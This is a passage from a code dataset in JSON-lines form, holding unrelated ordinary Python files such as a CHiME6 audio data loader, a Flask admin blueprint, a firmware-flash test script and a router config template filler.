os.path.split(sys.executable)[0]\n    pip = os.path.join(bin_, 'pip')\n    for package in requires:\n        cmd = [pip, 'install', package]\n        subprocess.call(cmd)\n    cmd = [sys.executable, sys.argv[0], 'develop']\n    subprocess.call(cmd)\n    sys.exit()\n\nsetup(name='osipkd',\n      version='0.0',\n      description='osipkd',\n      long_description=README + '\\n\\n' + CHANGES,\n      classifiers=[\n        \"Programming Language :: Python\",\n        \"Framework :: Pylons\",\n        \"Topic :: Internet :: WWW/HTTP\",\n        \"Topic :: Internet :: WWW/HTTP :: WSGI :: Application\",\n        ],\n      author='',\n      author_email='',\n      url='',\n      keywords='web pyramid pylons',\n      packages=find_packages(),\n      include_package_data=True,\n      zip_safe=False,\n      install_requires=requires,\n      tests_require=requires,\n      test_suite=\"osipkd\",\n      entry_points = \"\"\"\\\n      [paste.app_factory]\n      main = osipkd:main\n      [console_scripts]\n      initialize_osipkd_db = osipkd.scripts.initializedb:main \n      \"\"\",\n      )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"33384867","text":"from config import client, MONGO_BD_NAME\n\nKIND_SMILE = '😊'\nSAD_SMILE = '☹'\n\n\ndef get_weather_advice(temp):\n    if temp <= -15:\n        answer = 'Very cold.'\n    elif temp > -15 and temp <= 5:\n        answer = 'Rather chilly.'\n    elif temp > 5 and temp <= 24:\n        answer = 'Quite a pleasant temperature.'\n    else:\n        answer = 'Very hot.'\n\n    return answer\n\n\ndb = client.tg_bot\ndoings_collection = db['doings']\nrates_collection = db['rates']\n\n\ndef insert_into_db(collection, data):\n    collection.insert_one(data)\n\n\ndef get_many_from_db(collection, data):\n    return collection.find(data)\n\n\ndef get_one_from_db(collection, data):\n    return collection.find_one(data)\n\n\nhelp_text = '''\nList of available commands:\n/weather - weather\n/doings - add and view to-dos\n/creator - info about the developer\n/rate - rating\n'''\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"631911743","text":"def isIn(char, aStr):\n    '''\n    char: a single character\n    aStr: an alphabetized string\n\n    returns: True if char is in aStr; False otherwise\n    '''\n    if not aStr:\n        return False\n\n    mid_index = int(len(aStr)/2)\n    mid_char = aStr[mid_index]\n\n    if char == aStr:\n        return True\n    elif mid_char == char:\n        return True\n    elif len(aStr) == 1:\n        return False\n    elif char < mid_char:\n        return isIn(char, aStr[:mid_index])\n    else:\n        return isIn(char, aStr[mid_index+1:])\n\n    #Some ideas: Perhaps need to break problem into even/odd len strings, so that mid_char can be calculated/rounded consistently... \n","sub_path":"isIn.py","file_name":"isIn.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"609471429","text":"from torch.utils.data import Dataset\nfrom parsing.parse_chime6 import parse_chime6, get_session\nimport glob\nimport os\nfrom pathlib import Path\nimport soundfile as sf\nimport numpy as np\nimport torch\nfrom SSAD.utils.oladd import _gen_frame_indices\nimport random\nfrom pysndfx import AudioEffectsChain\n\nclass OnlineFeats(Dataset):\n\n    def __init__(self, chime6_root, split, label_root, configs, segment=300, probs=None):\n\n        self.configs = configs\n        self.segment = segment\n        self.probs = probs\n        meta = parse_chime6(chime6_root, split)\n\n        labels = glob.glob(os.path.join(label_root, \"*.wav\"))\n        lab_hash = {}\n\n        for l in labels:\n            l_sess = str(Path(l).stem).split(\"-\")[-1]\n            lab_hash[l_sess] = l\n\n        new = {}\n        for k in meta.keys():\n            if k not in lab_hash.keys():\n                print(\"removing key... 
this better be the validation set\")\n continue\n new[k] = meta[k]\n meta = new\n\n\n devices = []\n devices_hash = {}\n for sess in meta.keys():\n devices_hash[sess] = []\n #devices.extend(meta[sess][\"binaurals\"])\n for array in meta[sess][\"arrays\"].keys():\n devices.extend(meta[sess][\"arrays\"][array])\n devices_hash[sess].extend(meta[sess][\"arrays\"][array])\n\n self.devices = devices\n self.devices_hash = devices_hash # used for data augmentation\n\n\n #assert len(set(list(meta.keys())).difference(set(list(lab_hash.keys())))) == 0\n # remove keys\n\n\n self.label_hash = lab_hash\n\n if self.probs: # parse for data-augmentation\n label_one = []\n label_two = []\n\n for l in labels:\n c_label, _ = sf.read(l) # read it all\n sess = Path(l).stem.split(\"-\")[-1]\n # find contiguous\n tmp = self.get_segs(c_label, 1, 1)\n for s,e in tmp:\n assert not np.where(c_label[s:e] > 1)[0].any()\n tmp = [(sess, x[0], x[1]) for x in tmp] # we need session also\n label_one.extend(tmp)\n\n # do the same for two speakers\n tmp = self.get_segs(c_label, 2, 2)\n for s, e in tmp:\n assert not np.where(c_label[s:e] != 2)[0].any()\n tmp = [(sess, x[0], x[1]) for x in tmp]\n label_two.extend(tmp)\n\n self.label_one = label_one\n self.label_two = label_two\n\n self.tot_length = int(np.sum([len(sf.SoundFile(l)) for l in labels]) / segment)\n\n self.set_feats_func()\n\n\n def get_segs(self, label_vector, min_speakers, max_speakers):\n\n segs = []\n label_vector = np.logical_and(label_vector <= max_speakers, label_vector >= min_speakers)\n changePoints = np.where((label_vector[:-1] != label_vector[1:]) == True)[0]\n changePoints = np.concatenate((np.array(0).reshape(1, ), changePoints))\n if label_vector[0] == 1:\n start = 0\n else:\n start = 1\n for i in range(start, len(changePoints) - 1, 2):\n if (changePoints[i + 1] - changePoints[i]) > 30: # if only more than 30 frames\n segs.append([changePoints[i] +1, changePoints[i + 1]-1])\n\n return segs\n\n\n def set_feats_func(self):\n\n # initialize feats_function\n if self.configs[\"feats\"][\"type\"] == \"mfcc_kaldi\":\n from torchaudio.compliance.kaldi import mfcc\n self.feats_func = lambda x: mfcc(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)), **self.configs[\"mfcc_kaldi\"]).transpose(0, 1)\n elif self.configs[\"feats\"][\"type\"] == \"fbank_kaldi\":\n from torchaudio.compliance.kaldi import fbank\n self.feats_func = lambda x: fbank(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)), **self.configs[\"fbank_kaldi\"]).transpose(0, 1)\n elif self.configs[\"feats\"][\"type\"] == \"spectrogram_kaldi\":\n from torchaudio.compliance.kaldi import spectrogram\n self.feats_func = lambda x: spectrogram(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)),\n **self.configs[\"spectrogram_kaldi\"]).transpose(0, 1)\n else:\n raise NotImplementedError\n\n def __len__(self):\n return self.tot_length\n\n def noaugm(self):\n # no augmentation\n file = np.random.choice(self.devices)\n sess = get_session(file)\n start = np.random.randint(7000,\n len(sf.SoundFile(self.label_hash[sess])) - self.segment - 2) # skip first minute\n stop = start + self.segment\n label, _ = sf.read(self.label_hash[sess], start=start, stop=stop)\n if self.configs[\"task\"] == \"vad\":\n label = label >= 1\n elif self.configs[\"task\"] == \"osd\":\n label = label >= 2\n elif self.configs[\"task\"] == \"vadosd\":\n label = np.clip(label, 0, 2)\n elif self.configs[\"task\"] == \"count\":\n pass\n else:\n raise EnvironmentError\n # get file start\n start = int(start * 
self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])\n stop = int(stop * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"] )#+ \\\n # self.configs[\"data\"][\"fs\"]* self.configs[\"feats\"][\"hop_size\"] * 2)\n\n audio, fs = sf.read(file, start=start, stop=stop)\n\n if len(audio.shape) > 1: # binaural\n audio = audio[:, np.random.randint(0, 1)]\n\n audio = self.feats_func(audio)\n label = label[:audio.shape[-1]]\n return audio, torch.from_numpy(label).long(), torch.ones(len(label)).bool()\n\n @staticmethod\n def normalize(signal, target_dB):\n\n fx = (AudioEffectsChain().custom(\n \"norm {}\".format(target_dB)))\n signal = fx(signal)\n return signal\n\n def __getitem__(self, item):\n\n if not self.probs:\n return self.noaugm()\n else:\n spkrs = np.random.choice([1, 4], p=self.probs)\n\n if spkrs == 1:\n return self.noaugm()\n elif spkrs == 4:\n # sample 2 from labels one\n mix = []\n labels = []\n first_lvl = None\n maxlength = None\n for i in range(spkrs):\n sess, start, stop = random.choice(self.label_one)\n label, _ = sf.read(self.label_hash[sess], start=start, stop=stop)\n\n # get file start\n start = int(start * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])\n stop = int(stop * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])\n file = np.random.choice(self.devices_hash[sess])\n audio, fs = sf.read(file, start=start, stop=stop)\n if i == 0:\n c_lvl = np.clip(random.normalvariate(*self.configs[\"augmentation\"][\"abs_stats\"]), -40, 1) # allow for clipping in CHiME some devices are clipped\n first_lvl = c_lvl\n audio = self.normalize(audio, c_lvl)\n maxlength = len(audio)\n else:\n c_lvl = np.clip(first_lvl - random.normalvariate(*self.configs[\"augmentation\"][\"rel_stats\"]), first_lvl-10, min(first_lvl+10, 0))\n audio = self.normalize(audio, c_lvl)\n rand_offset = random.randint(0, maxlength // 2)\n # pad only heads\n audio = np.pad(audio, (rand_offset, 0), 'constant')\n label = np.pad(label, (int(rand_offset / (self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])) , 0), 'constant')\n maxlength = max(len(audio), maxlength)\n\n mix.append(audio)\n labels.append(label)\n\n assert maxlength == max([len(x) for x in mix])\n if maxlength > self.segment*self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"]:\n mix = [x[:int(self.segment*self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])] for x in mix]\n labels = [x[:self.segment] for x in labels]\n valid = torch.ones(self.segment).bool()\n else:\n valid = torch.ones(self.segment).bool()\n valid[int(maxlength/ (self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])):] = False\n\n padlen = int(self.segment * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])\n mix = [np.pad(x, (0, padlen - len(x)), 'constant') for x in mix]\n mix = np.sum(np.stack(mix), 0)\n mix = np.clip(mix, -1, 1) # clipping audio\n\n padlen = self.segment\n labels = [np.pad(x, (0, padlen - len(x)), 'constant') for x in labels]\n labels = np.sum(np.stack(labels), 0)\n mix = self.feats_func(mix)\n #assert mix.shape[-1] == 298\n #assert mix.shape[-1] == len(labels)\n labels = labels[:mix.shape[-1]]\n if self.configs[\"task\"] == \"vadosd\":\n labels = np.clip(labels, 0, 2)\n valid = valid[:mix.shape[-1]]\n return mix, torch.from_numpy(labels).long(), valid\n\n elif spkrs == 3:\n pass\n # sample 1 from label one and two from label two\n elif spkrs == 4:\n pass\n # sample 2 from label one and two 
from label two\n\nclass OnlineChunkedFeats(Dataset):\n\n def __init__(self, chime6_root, split, label_root, configs, segment=300):\n\n self.configs = configs\n self.segment = segment\n meta = parse_chime6(chime6_root, split)\n\n devices = {}\n for sess in meta.keys():\n devices[sess] = []\n for array in meta[sess][\"arrays\"].keys():\n devices[sess].extend(meta[sess][\"arrays\"][array]) # only channel 1\n\n labels = glob.glob(os.path.join(label_root, \"*.wav\"))\n lab_hash = {}\n\n for l in labels:\n l_sess = str(Path(l).stem).split(\"-\")[-1]\n lab_hash[l_sess] = l\n\n self.lab_hash = lab_hash\n chunks = self.get_chunks(labels)\n\n\n examples = []\n for sess in chunks.keys():\n for s, e in chunks[sess]:\n for dev in devices[sess]:\n examples.append((dev, s, e))\n\n self.examples = examples\n\n self.set_feats_func()\n\n def set_feats_func(self):\n\n # initialize feats_function\n if self.configs[\"feats\"][\"type\"] == \"mfcc_kaldi\":\n from torchaudio.compliance.kaldi import mfcc\n self.feats_func = lambda x: mfcc(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)),\n **self.configs[\"mfcc_kaldi\"]).transpose(0, 1)\n elif self.configs[\"feats\"][\"type\"] == \"fbank_kaldi\":\n from torchaudio.compliance.kaldi import fbank\n self.feats_func = lambda x: fbank(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)),\n **self.configs[\"fbank_kaldi\"]).transpose(0, 1)\n elif self.configs[\"feats\"][\"type\"] == \"spectrogram_kaldi\":\n from torchaudio.compliance.kaldi import spectrogram\n self.feats_func = lambda x: spectrogram(torch.from_numpy(x.astype(\"float32\").reshape(1, -1)),\n **self.configs[\"spectrogram_kaldi\"]).transpose(0, 1)\n else:\n raise NotImplementedError\n\n def get_chunks(self, labels):\n\n chunks = {}\n chunk_size = self.configs[\"data\"][\"segment\"]\n frame_shift = self.configs[\"data\"][\"segment\"]\n\n for l in labels:\n sess = Path(l).stem.split(\"-\")[-1]\n chunks[sess] = []\n # generate chunks for this file\n c_length = len(sf.SoundFile(l)) # get the length of the session files in samples\n for st, ed in _gen_frame_indices(\n c_length, chunk_size, frame_shift, use_last_samples=False):\n if st < 7000: # exclude first minute which contains enrollement for each speaker\n continue\n chunks[sess].append([st, ed])\n return chunks\n\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, item):\n\n device, s, e = self.examples[item]\n sess = get_session(device)\n labelfile = self.lab_hash[sess]\n\n label, _ = sf.read(labelfile, start=s, stop=e)\n if self.configs[\"task\"] == \"vad\":\n label = label >= 1\n elif self.configs[\"task\"] == \"osd\":\n label = label >= 2\n elif self.configs[\"task\"] == \"vadosd\":\n label = np.clip(label, 0, 2)\n elif self.configs[\"task\"] == \"count\":\n pass\n else:\n raise EnvironmentError\n\n start = int(s * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"])\n stop = int(e * self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"] +\n self.configs[\"data\"][\"fs\"] * self.configs[\"feats\"][\"hop_size\"] * 2)\n\n audio, fs = sf.read(device, start=start, stop=stop)\n\n if len(audio.shape) > 1: # binaural\n audio = audio[:, np.random.randint(0, 1)]\n\n audio = self.feats_func(audio)\n assert audio.shape[-1] == len(label)\n return audio, torch.from_numpy(label).long()\n\n\nif __name__ == \"__main__\":\n\n import yaml\n with open(\"/home/sam/Projects/SSAD/egs/CHiME6/conf/train.yml\", \"r\") as f:\n confs = yaml.load(f)\n\n a = 
OnlineFeats(\"/media/sam/cb915f0e-e440-414c-bb74-df66b311d09d/CHiME6\", \"train\",\n \"/media/sam/cb915f0e-e440-414c-bb74-df66b311d09d/labels/train\", confs, probs=(0.0, 1.0))\n from torch.utils.data import DataLoader\n for i in a:\n print(i)\n\n\n\n\n","sub_path":"egs/CHiME6/local/online_data.py","file_name":"online_data.py","file_ext":"py","file_size_in_byte":14113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"106019852","text":"# Cody Brown\n# named_tuple.py\n# Mon Dec 25 06:57:14 CST 2017\n# *********************************************************\ndef main():\n from collections import namedtuple\n\n Car = namedtuple('Car', 'color mileage')\n Saxophone = namedtuple('Saxophone', 'make model')\n my_car = Car('Red', 3425.6)\n my_sax = Saxophone('Tenor', 'Borgani')\n print(my_car.color, my_car.mileage)\n print(my_sax.make, my_sax.model)\n\n\nif __name__ == \"__main__\": main() # main func call\n","sub_path":"named_tuple.py","file_name":"named_tuple.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"399726868","text":"from common.hats import HatsTest\n\nclass Installation(HatsTest):\n def __init__(self, *args, **kwargs):\n self.software = None\n super(Installation, self).__init__(*args, **kwargs)\n\n def add_software(self, software):\n self.software = software\n\n\nclass Octo2Installation(Installation):\n def run(self):\n self.printLog(\"Software version is changed - [%s]\" % self.software.version)\n self.printLog(\"Target is power off\")\n self.powerOff()\n self.delay(1)\n self.printLog(\"Target is power on\")\n self.powerOn()\n\n self.printLog(\"Waiting system ready for software update\")\n str_arrow_key = \"%c%c%c\\n\" % (chr(0x1b), chr(0x5b), chr(0x42))\n self.waitLog(\"BCM72500010\", -1, str_arrow_key)\n self.waitLog(\"AVS init\", -1, str_arrow_key)\n self.waitLog(\"BOLT\", -1, str_arrow_key)\n self.waitLog(\"ROOT >\", -1, str_arrow_key)\n self.waitLog(\"ROOT >\", -1, \"\\n\")\n self.waitLog(\"ROOT >\", -1, \"\\n\")\n self.waitLog(\"ROOT >\", -1, \"\\n\")\n\n self.waitLog(\"[drv_NVRAM_Write]\", -1)\n self.waitLog(\"[drv_NVRAM_Write]\", -1)\n self.printLog(\"Try update software with %s\" % self.software.version)\n\n self.writeSerial(\"\\n\")\n self.writeSerial(\"autoflash \")\n self.writeSerial(\"-server=%s \" % self.getIpAddr())\n self.writeSerial(\"-release=%s\\n\" % self.software.version)\n # self.writeSerial(\"-release=%s\\n\" % \"0.00.02\")\n\n self.printLog(\"Waiting system updated\")\n # self.waitLog(\"BCM72500010\", -1)\n self.waitLog(\"obama\", -1)\n self.printLog(\"Rebooting is done\")\n self.finish()\n","sub_path":"jobs/installation.py","file_name":"installation.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"86856488","text":"import os\n\nimport setuptools\n\nreadme_path = os.path.join(os.path.dirname(__file__), 'README.md')\nwith open(readme_path, 'r') as fp:\n long_description = fp.read()\n\nsetuptools.setup(\n name=\"tasksch\",\n use_scm_version=True,\n setup_requires=['setuptools_scm'],\n author=\"AP Ljungquist\",\n author_email=\"ap@ljungquist.eu\",\n description=\"A tiny library for easing into some modern asyncio\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/apljungquist/tasksch\",\n packages=setuptools.find_packages('tasksch'),\n 
install_requires=[],\n    classifiers=[\n        \"Development Status :: 3 - Alpha\",\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n)\n","sub_path":"pypi_install_script/tasksch-0.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"443841810","text":"from flask import Blueprint, render_template, jsonify\n\nfrom app.main.models import Feed\n\nadmin = Blueprint('admin', __name__, url_prefix=\"/admin\")\n\n\n@admin.route('/')\ndef home():\n    return render_template('admin/index.html')\n\n\n@admin.route('/login')\ndef login():\n    return render_template('admin/login.html')\n\n\n@admin.route('/api')\ndef api_home():\n    all_feeds = Feed.query.all()\n    print(all_feeds)\n    if all_feeds:\n        arr = []\n        for obj in all_feeds:\n            arr.append(obj.serialize())\n        print(arr)\n        return jsonify(arr)\n    return \"haha\"\n","sub_path":"app/admin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"406332639","text":"import os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nIMG_PATH = os.path.dirname(os.path.abspath(__file__))\n\n\ndef plot_function(\n    input_signal: np.ndarray,\n    output_signal: np.ndarray,\n    name: str = None\n) -> None:\n    plt.step(input_signal, output_signal)\n    plt.xlabel('a')\n    plt.ylabel('f(a)')\n    plt.xlim(np.min(input_signal) - 0.2, np.max(input_signal) + 0.2)\n    plt.ylim(np.min(output_signal) - 0.2, np.max(output_signal) + 0.2)\n    if name:\n        plt.title(f\"Activation function: {name}\")\n    plt.show()\n\n\nif __name__ == \"__main__\":\n    input_signal = np.linspace(start=-10, stop=10, num=1000)\n\n    # Step function\n    # f(a) = 0, if a <= 0 else 1\n    output_signal = [0 if a <= 0 else 1 for a in input_signal]\n    plot_function(input_signal, output_signal, name='step')\n\n    # Tanh\n    # f(a) = tanh(a) = 2 / (1+e^(-2a)) - 1\n    output_signal = [2 / (1 + np.exp(-2 * a)) - 1 for a in input_signal]\n    plot_function(input_signal, output_signal, name='tanh')\n\n    # SIGMOID\n    # sigmoid(a) = 1 / (1 + e^-a)\n    output_signal = [1 / (1 + np.exp(-a)) for a in input_signal]\n    plot_function(input_signal, output_signal, name='sigmoid')\n\n    # RELU = Rectified Linear Unit\n    # f(a) = max (0, a)\n    output_signal = [max(0, a) for a in input_signal]\n    plot_function(input_signal, output_signal, name='relu')\n","sub_path":"01_Tutorials/Udemy Kurs Deep Learning/Chapter4_NN/Chapter4_2_DeepNeuralNetworks/activationsFunctions.py","file_name":"activationsFunctions.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143662253","text":"import random\n\nimport torch.utils.data\nfrom torch import nn\nfrom torch import optim\nfrom torch.backends import cudnn\nfrom torchvision import transforms\n\nfrom dataset import data_set\nfrom model import generate_model\nfrom opts import parse_opts\nfrom show_answer import show_answer_epoch\nfrom target_transforms import ClassLabel\n\n\ndef worker_init_fn(worker_id: int):\n    random.seed(worker_id)\n\n\n# Get the command-line options\nopt = parse_opts()\n\ndevice = torch.device('cpu' if opt.no_cuda else 'cuda')\n\n# Get the number of input channels\nopt.n_channel = 3\nif opt.add_gray_image_paths:\n    opt.n_channel += len(opt.add_gray_image_paths)\nif opt.add_RGB_image_paths:\n    opt.n_channel += len(opt.add_RGB_image_paths) 
* 3\n\nopt.scales = [opt.initial_scale]\nfor i in range(1, opt.n_scales):\n    opt.scales.append(opt.scales[-1] * opt.scale_step)\nopt.arch = '{}-{}'.format(opt.model, opt.model_depth)\nprint(opt)\n\nrandom.seed(opt.manual_seed)\ntorch.manual_seed(opt.manual_seed)\nif not opt.no_cuda:\n    cudnn.benchmark = True\n    cudnn.deterministic = True\n\nmodel, parameters = generate_model(opt)\nprint(model)\ncriterion = nn.CrossEntropyLoss()\nif not opt.no_cuda:\n    criterion = criterion.cuda()\n\noptimizer = None\ntrain_loader = None\nval_loader = None\n\n# Register each image-set path and its channel count in a dict\npaths = {opt.video_path: '3ch'}\nif opt.add_gray_image_paths:\n    for one_ch in opt.add_gray_image_paths:\n        paths[one_ch] = '1ch'\nif opt.add_RGB_image_paths:\n    for three_ch in opt.add_RGB_image_paths:\n        paths[three_ch] = '3ch'\n\nspatial_transform = transforms.Compose([\n    transforms.ToTensor(),\n    transforms.Normalize([0, 0, 0], [1, 1, 1])\n])\ntarget_transform = ClassLabel(True)\ntraining_data = data_set[opt.data_set](\n    paths,\n    opt.annotation_path,\n    'training',\n    spatial_transform=spatial_transform,\n    target_transform=target_transform,\n)\ntrain_loader = torch.utils.data.DataLoader(\n    training_data,\n    batch_size=opt.batch_size,\n    shuffle=True,\n    num_workers=opt.n_threads,\n    pin_memory=True,\n    worker_init_fn=worker_init_fn\n)\n\ndampening = 0 if opt.nesterov else opt.dampening\noptimizer = optim.SGD(\n    model.parameters(),\n    lr=opt.learning_rate,\n    momentum=opt.momentum,\n    dampening=dampening,\n    weight_decay=opt.weight_decay,\n    nesterov=opt.nesterov\n)\nspatial_transform = transforms.Compose([\n    transforms.ToTensor(),\n    transforms.Normalize([0, 0, 0], [1, 1, 1])\n])\ntarget_transform = ClassLabel(True)\nvalidation_data = data_set[opt.data_set](\n    paths,\n    opt.annotation_path,\n    'validation',\n    opt.n_val_samples,\n    spatial_transform=spatial_transform,\n    target_transform=target_transform,\n)\nval_loader = torch.utils.data.DataLoader(\n    validation_data,\n    batch_size=opt.batch_size,\n    shuffle=False,\n    num_workers=opt.n_threads,\n    pin_memory=True,\n    worker_init_fn=worker_init_fn\n)\n\nif opt.show_answer_resume_path:\n    print('loading checkpoint {}'.format(opt.show_answer_resume_path))\n    checkpoint = torch.load(opt.show_answer_resume_path)\n    assert opt.arch == checkpoint['arch']\n\n    opt.begin_epoch = checkpoint['epoch']\n    model.load_state_dict(checkpoint['state_dict'])\n    if not opt.no_train:\n        optimizer.load_state_dict(checkpoint['optimizer'])\n        optimizer.param_groups[0]['lr'] = opt.learning_rate\n\nwith open(opt.show_answer_result_path, 'w') as f:\n    f.write('video_name model_answer true_answer answer subset\\n')\nprint('run')\nshow_answer_epoch(train_loader, model, opt, 'training', device)\nshow_answer_epoch(val_loader, model, opt, 'validation', device)\n","sub_path":"show_answer_main.py","file_name":"show_answer_main.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"87175986","text":"\nimport numpy as np\nimport itertools\nfrom src.commons.py_spaces import Discrete, BoundedContinuous\nfrom bark.models.behavior import DynamicBehaviorModel\nfrom bark.models.dynamic import SingleTrackModel, TripleIntegratorModel\nfrom modules.runtime.commons.parameters import ParameterServer\nfrom src.wrappers.action_wrapper import ActionWrapper\n\nclass DynamicModel(ActionWrapper):\n    \"\"\"This module wraps the SingleTrack model\n    and requires the steering angle and acceleration\n    as system inputs. 
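Per action_to_behavior below, the incoming\n    action vector is reshaped into one (steering angle, acceleration) pair per\n    controlled agent.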
\n    \"\"\"\n    def __init__(self,\n                 model_name=\"SingleTrackModel\",\n                 params=ParameterServer()):\n        ActionWrapper.__init__(self, params)\n        self._control_inputs = \\\n            self._params[\"ML\"][\"DynamicModel\"][\"action_dimension\",\n                                               \"Dimension of action\",\n                                               2]\n        self._dynamic_model = eval(\"{}(self._params)\".format(model_name))\n        self._behavior_models = []\n        self._controlled_agents = []\n\n    def reset(self, world, agents_to_act):\n        \"\"\"see base class\n        \"\"\"\n        super(DynamicModel, self).reset(world=world,\n                                        agents_to_act=agents_to_act)\n        self._behavior_models = []\n        self._controlled_agents = agents_to_act\n        for agent_id in agents_to_act:\n            self._behavior_models.append(DynamicBehaviorModel(self._dynamic_model,\n                                                              self._params))\n            if agent_id in world.agents:\n                actions = np.zeros(shape=(self._control_inputs), dtype=np.float32)\n                self._behavior_models[-1].SetLastAction(actions)\n                world.agents[agent_id].behavior_model = self._behavior_models[-1]\n            else:\n                raise ValueError(\"AgentID does not exist in world.\")\n        return world\n\n    def action_to_behavior(self, world, action):\n        \"\"\"see base class\n        \"\"\"\n        actions = np.reshape(action, (-1, self._control_inputs))\n        for i, a in enumerate(actions):\n            self._behavior_models[i].SetLastAction(a)\n        return world\n\n    @property\n    def action_space(self):\n        \"\"\"see base class\n        \"\"\"\n        action_num = self._params[\"ML\"][\"DynamicModel\"][\"action_num\",\n                                                        \"Number of actions.\",\n                                                        1]\n        lower_bounds = [self._params[\"ML\"][\"DynamicModel\"][\"actions_lower_bound\",\n                                                           \"Lower-bound for actions.\",\n                                                           [-0.5, -0.01]] for _ in range(action_num)]\n        upper_bounds = [self._params[\"ML\"][\"DynamicModel\"][\"actions_upper_bound\",\n                                                           \"Upper-bound for actions.\",\n                                                           [0.5, 0.01]] for _ in range(action_num)]\n        return BoundedContinuous(\n            self._control_inputs*action_num,\n            low=list(itertools.chain(*lower_bounds)),\n            high=list(itertools.chain(*upper_bounds)))","sub_path":"src/wrappers/dynamic_model.py","file_name":"dynamic_model.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357780780","text":"import re\nimport time\n\n# Stuck these in to make them easier for user input on a GUI\nvpn = 'TBL'\nnum = '213'\nmpls = '4'\ninet = '5'\nhpgw = '213.131.57.185'\nhpfw = '213.131.57.186'\nlan_nw1 = '213.131.57.184'\nisp_ip = '213.131.57.182'\nisp1 = '213.131.57.181'\n\n\nobs_asn_prem = int(num) + 100\nobs_asn = str(65) + str(obs_asn_prem)\n\nreplacement_dict = {\n    \"$vpn\": vpn,\n    \"$num\": num,\n    \"$mpls\": mpls,\n    \"$inet\": inet,\n    \"$hpgw\": hpgw,\n    \"$hpfw\": hpfw,\n    \"$lan_nw1\": lan_nw1,\n    \"$isp_ip\": isp_ip,\n    \"$isp1\": isp1,\n    \"$obs_asn\": obs_asn\n}\n\ntext = 'This is a bunch of text! 
$num $num $vpn $vpn $vpn $vpn $num $num $num'\n\ndef generate_file_name(cfg_file_name):\n    file_name = cfg_file_name + \".\" + time.strftime(\"%Y%m%d\") + \".txt\"\n    return file_name\n\n\ndef multiple_find_and_replace(dict_replacer,text):\n    # Compile a regex that matches any key in dict_replacer (regex.pattern shows the resulting pattern)\n    regex = re.compile(\"(%s)\" % \"|\".join(map(re.escape,dict_replacer.keys())))\n    # Replace the text input per the patterns seen in the regex above\n    return regex.sub(lambda mo:dict_replacer[mo.string[mo.start():mo.end()]], text)\n\n\ndef open_file_read_and_stripped_returned_list(cfg_template_file):\n    f = open(cfg_template_file, 'r')\n    config_lines_with_newline_ends = f.readlines()\n    f.close()\n    config_lines = []\n    for line in config_lines_with_newline_ends:\n        config_lines.append(line.rstrip())\n    return config_lines\n\n\ndef write_new_cnf(new_cnf_list, new_cnf_file):\n    filename = new_cnf_file\n    try:\n        output_file = open(filename, 'w')\n        for line in new_cnf_list:\n            output_file.write(line + \"\\n\")\n        output_file.close()\n        return True\n    except IOError:\n        return False\n\n\nrouter_template_file_name = \"VPN_ROUTER_TEMPLATE.txt\"\nswitch_template_file_name = \"VPN_SWITCH_TEMPLATE.txt\"\n\nrouter_output_file_name = generate_file_name( vpn + 'RVPN1')\nswitch_output_file_name = generate_file_name( vpn + 'SVPN1')\n\nrouter_cfg_template = open_file_read_and_stripped_returned_list(router_template_file_name)\nswitch_cfg_template = open_file_read_and_stripped_returned_list(switch_template_file_name)\n\nnew_router_cnf_file=[]\nnew_switch_cnf_file=[]\n\nfor item in router_cfg_template:\n    new_router_cnf_file.append(multiple_find_and_replace(replacement_dict, item))\n\nfor item in switch_cfg_template:\n    new_switch_cnf_file.append(multiple_find_and_replace(replacement_dict, item))\n\n#for item in switch_cfg_template:\n#    print(multiple_find_and_replace(replacement_dict, 